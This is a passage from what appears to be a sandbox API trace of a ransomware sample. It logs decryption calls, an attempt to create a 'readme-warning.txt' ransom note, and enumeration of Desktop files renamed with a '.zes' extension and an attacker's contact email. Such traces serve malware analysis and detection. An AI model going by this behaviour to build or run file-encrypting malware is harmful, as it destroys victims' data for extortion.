| out: hHeap=0x520000) returned 1 [0150.035] GetProcessHeap () returned 0x520000 [0150.035] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f688d8 | out: hHeap=0x520000) returned 1 [0150.035] GetProcessHeap () returned 0x520000 [0150.035] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f18210 | out: hHeap=0x520000) returned 1 [0150.035] GetProcessHeap () returned 0x520000 [0150.035] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16c60 | out: hHeap=0x520000) returned 1 [0150.035] GetProcessHeap () returned 0x520000 [0150.035] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16530 | out: hHeap=0x520000) returned 1 [0150.035] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57feb8 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5809e0 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f54370 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f54338 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f43588 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x58c440 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5443a8 | out: hHeap=0x520000) returned 1 [0150.036] GetProcessHeap () returned 0x520000 [0150.036] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443a8 [0150.036] PostMessageW (hWnd=0x5011c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1 [0150.046] GetProcessHeap () returned 0x520000 [0150.046] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18210 [0150.046] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.046] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f18210, pdwDataLen=0x40eff30 | out: pbData=0x3f18210, pdwDataLen=0x40eff30) returned 1 [0150.046] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.046] GetProcessHeap () returned 0x520000 [0150.046] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x3f18258 [0150.047] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.047] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f18258, pdwDataLen=0x40eff30 | out: pbData=0x3f18258, pdwDataLen=0x40eff30) returned 1 [0150.047] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.047] GetProcessHeap () returned 0x520000 [0150.047] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6e0) returned 0x3f30b20 [0150.047] CryptImportKey (in: hProv=0x534c10, pbData=0x40efec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.047] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f30b20, pdwDataLen=0x40eff30 | out: pbData=0x3f30b20, pdwDataLen=0x40eff30) returned 1 [0150.047] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.047] wsprintfW (in: param_1=0x40eef0c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt") returned 56 [0150.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme-warning.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.047] GetProcessHeap () returned 0x520000 [0150.047] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f30b20 | out: hHeap=0x520000) returned 1 [0150.047] GetProcessHeap () returned 0x520000 [0150.047] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f18258 | out: hHeap=0x520000) returned 1 [0150.047] GetProcessHeap () returned 0x520000 [0150.047] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f18210 | out: hHeap=0x520000) returned 1 Thread: id = 150 os_tid = 0xa68 [0150.026] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0150.026] GetProcessHeap () returned 0x520000 [0150.026] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5c) returned 0x575338 [0150.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa7e8cab0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName=".", cAlternateFileName="")) returned 0x3f43508 [0150.027] GetProcessHeap () returned 0x520000 [0150.027] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x575338 | out: hHeap=0x520000) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa7e8cab0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="..", cAlternateFileName="")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x254f7df0, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0x66f7cba0, ftLastAccessTime.dwHighDateTime=0x1d5e569, ftLastWriteTime.dwLowDateTime=0xa77dacd0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x7ea4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="0XH GEu.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="0XHGEU~1.ZES")) returned 1 [0150.027] GetProcessHeap () returned 0x520000 [0150.027] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x25e) returned 0x3f137c8 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a96f910, ftCreationTime.dwHighDateTime=0x1d5e325, ftLastAccessTime.dwLowDateTime=0x574b5d00, ftLastAccessTime.dwHighDateTime=0x1d5da85, ftLastWriteTime.dwLowDateTime=0xa7800e30, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x5c44, dwReserved0=0x0, dwReserved1=0xffff, cFileName="4D-19xSRnhVYoDBhN50S.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="4D-19X~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b76c7c0, ftCreationTime.dwHighDateTime=0x1d5d86f, ftLastAccessTime.dwLowDateTime=0xe8ad5fc0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0xa7800e30, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1734, dwReserved0=0x0, dwReserved1=0xffff, cFileName="5iwkI64gBz.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="5IWKI6~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd9a620, ftCreationTime.dwHighDateTime=0x1d5df20, ftLastAccessTime.dwLowDateTime=0x9b79a3a0, ftLastAccessTime.dwHighDateTime=0x1d5d7cf, ftLastWriteTime.dwLowDateTime=0xa7826f90, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x17474, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ahtoY.flv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="AHTOYF~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51e86f0, ftCreationTime.dwHighDateTime=0x1d5e3b0, ftLastAccessTime.dwLowDateTime=0x20be99a0, ftLastAccessTime.dwHighDateTime=0x1d5d954, ftLastWriteTime.dwLowDateTime=0xa784d0f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x14134, dwReserved0=0x0, dwReserved1=0xffff, cFileName="aisB0FsXovRbNO53dEZX.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="AISB0F~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6b1b60, ftCreationTime.dwHighDateTime=0x1d5dcf0, ftLastAccessTime.dwLowDateTime=0x15002f30, ftLastAccessTime.dwHighDateTime=0x1d5e065, ftLastWriteTime.dwLowDateTime=0xa7873250, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x120b4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bsikVZ.jpg.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="BSIKVZ~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8c9350, ftCreationTime.dwHighDateTime=0x1d5dd00, ftLastAccessTime.dwLowDateTime=0x96f9f2e0, ftLastAccessTime.dwHighDateTime=0x1d5e5fc, ftLastWriteTime.dwLowDateTime=0xa78993b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x5a84, dwReserved0=0x0, dwReserved1=0xffff, cFileName="BU7M mcTpJ93bZk.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="BU7MMC~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c66490, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x4fe162a0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0xa78bf510, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x44f4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bXlb_7naN_pfr0BxScfj.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="BXLB_7~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b9d27e0, ftCreationTime.dwHighDateTime=0x1d5de77, ftLastAccessTime.dwLowDateTime=0x826bde00, ftLastAccessTime.dwHighDateTime=0x1d5dcbb, ftLastWriteTime.dwLowDateTime=0xa78bf510, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xe404, dwReserved0=0x0, dwReserved1=0xffff, cFileName="DqWuUGnY.avi.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="DQWUUG~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17c4400, ftCreationTime.dwHighDateTime=0x1d5df23, ftLastAccessTime.dwLowDateTime=0x700ba990, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xa790b7d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x8ea4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="D_5K_QCaeZaqS1f_Oh_.avi.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="D_5K_Q~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9be0aa0, ftCreationTime.dwHighDateTime=0x1d5da10, ftLastAccessTime.dwLowDateTime=0x1222bd30, ftLastAccessTime.dwHighDateTime=0x1d5e6c5, ftLastWriteTime.dwLowDateTime=0xa7931930, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x7ff4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="h9 vL1qAQ0j.mp3.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="H9VL1Q~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a841b50, ftCreationTime.dwHighDateTime=0x1d5e104, ftLastAccessTime.dwLowDateTime=0x67fd1970, ftLastAccessTime.dwHighDateTime=0x1d5e6e4, ftLastWriteTime.dwLowDateTime=0xa7957a90, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xc124, dwReserved0=0x0, dwReserved1=0xffff, cFileName="j-fJcx.m4a.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="J-FJCX~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x335a1ae0, ftCreationTime.dwHighDateTime=0x1d5e164, ftLastAccessTime.dwLowDateTime=0x61df73c0, ftLastAccessTime.dwHighDateTime=0x1d5d9c0, ftLastWriteTime.dwLowDateTime=0xa797dbf0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1bd4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="JTNWKHDQn2XuLRv.png.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="JTNWKH~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c7d930, ftCreationTime.dwHighDateTime=0x1d5d96b, ftLastAccessTime.dwLowDateTime=0x26a93000, ftLastAccessTime.dwHighDateTime=0x1d5dbc5, ftLastWriteTime.dwLowDateTime=0xa79a3d50, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x12be4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="K8FlFC.pdf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="K8FLFC~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c39980, ftCreationTime.dwHighDateTime=0x1d5d7c7, ftLastAccessTime.dwLowDateTime=0xdf1331b0, ftLastAccessTime.dwHighDateTime=0x1d5d9b6, ftLastWriteTime.dwLowDateTime=0xa79c9eb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xa684, dwReserved0=0x0, dwReserved1=0xffff, cFileName="l3CDAV63MRYTd8k.png.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="L3CDAV~1.ZES")) returned 1 [0150.027] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd706990, ftCreationTime.dwHighDateTime=0x1d5d876, ftLastAccessTime.dwLowDateTime=0x1e5a9d50, ftLastAccessTime.dwHighDateTime=0x1d5e55a, ftLastWriteTime.dwLowDateTime=0xa79f0010, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x3aa4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="MkSA.m4a.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="MKSAM4~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5775f30, ftCreationTime.dwHighDateTime=0x1d5db2d, ftLastAccessTime.dwLowDateTime=0xbe382010, ftLastAccessTime.dwHighDateTime=0x1d5deaf, ftLastWriteTime.dwLowDateTime=0xa7a3c2d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xc144, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Ml-L2Mnu1hfDn3Ebw.png.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ML-L2M~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7a0020, ftCreationTime.dwHighDateTime=0x1d5e593, ftLastAccessTime.dwLowDateTime=0x208c23e0, ftLastAccessTime.dwHighDateTime=0x1d5d994, ftLastWriteTime.dwLowDateTime=0xa7a62430, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x11bc4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="NZt4WTx8.ots.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="NZT4WT~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47c93b50, ftCreationTime.dwHighDateTime=0x1d5db29, ftLastAccessTime.dwLowDateTime=0xfbb17060, ftLastAccessTime.dwHighDateTime=0x1d5dfa7, ftLastWriteTime.dwLowDateTime=0xa7a88590, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x19044, dwReserved0=0x0, dwReserved1=0xffff, cFileName="o4Mezc2IK4f8C_fMJ.rtf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="O4MEZC~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475420c0, ftCreationTime.dwHighDateTime=0x1d5e5fd, ftLastAccessTime.dwLowDateTime=0xbec567f0, ftLastAccessTime.dwHighDateTime=0x1d5e3bd, ftLastWriteTime.dwLowDateTime=0xa7aae6f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x7a54, dwReserved0=0x0, dwReserved1=0xffff, cFileName="p6WJ6Sf_Bnqv.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="P6WJ6S~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd92ca0, ftCreationTime.dwHighDateTime=0x1d5dde8, ftLastAccessTime.dwLowDateTime=0x14a0b710, ftLastAccessTime.dwHighDateTime=0x1d5dd65, ftLastWriteTime.dwLowDateTime=0xa7ad4850, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x16e14, dwReserved0=0x0, dwReserved1=0xffff, cFileName="rcM75 cm.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="RCM75C~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e8cab0, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7e8cab0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0xffff, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1924cd80, ftCreationTime.dwHighDateTime=0x1d5d860, ftLastAccessTime.dwLowDateTime=0xc779eae0, ftLastAccessTime.dwHighDateTime=0x1d5e027, ftLastWriteTime.dwLowDateTime=0xa7afa9b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xe3e4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="rFizuWFKJxS8V2i7l3.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="RFIZUW~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6135f5d0, ftCreationTime.dwHighDateTime=0x1d5df7d, ftLastAccessTime.dwLowDateTime=0x6e4a95b0, ftLastAccessTime.dwHighDateTime=0x1d5e215, ftLastWriteTime.dwLowDateTime=0xa7afa9b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xc9b4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="upgHuG7Awn9.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="UPGHUG~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc667d60, ftCreationTime.dwHighDateTime=0x1d5db8e, ftLastAccessTime.dwLowDateTime=0x80e68bc0, ftLastAccessTime.dwHighDateTime=0x1d5e76a, ftLastWriteTime.dwLowDateTime=0xa7b20b10, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1454, dwReserved0=0x0, dwReserved1=0xffff, cFileName="uSOZ4TNyZhhaa Gl3.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="USOZ4T~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3998fd30, ftCreationTime.dwHighDateTime=0x1d5db4d, ftLastAccessTime.dwLowDateTime=0xf13f4520, ftLastAccessTime.dwHighDateTime=0x1d5dd2d, ftLastWriteTime.dwLowDateTime=0xa7b92f30, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x2344, dwReserved0=0x0, dwReserved1=0xffff, cFileName="vvYk6R2xu.xlsx.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="VVYK6R~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2910a5d0, ftCreationTime.dwHighDateTime=0x1d5d922, ftLastAccessTime.dwLowDateTime=0xc421c190, ftLastAccessTime.dwHighDateTime=0x1d5d908, ftLastWriteTime.dwLowDateTime=0xa7bb9090, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x9654, dwReserved0=0x0, dwReserved1=0xffff, cFileName="W83hY-ueVY.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="W83HY-~1.ZES")) returned 1 [0150.028] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Xgmd_gfDjhMfGMTGlo", cAlternateFileName="XGMD_G~1")) returned 1 [0150.028] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0150.028] GetProcessHeap () returned 0x520000 [0150.028] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x82) returned 0x547038 [0150.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\*.*", lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3f435c8 [0150.028] GetProcessHeap () returned 0x520000 [0150.028] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x547038 | out: hHeap=0x520000) returned 1 [0150.029] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, 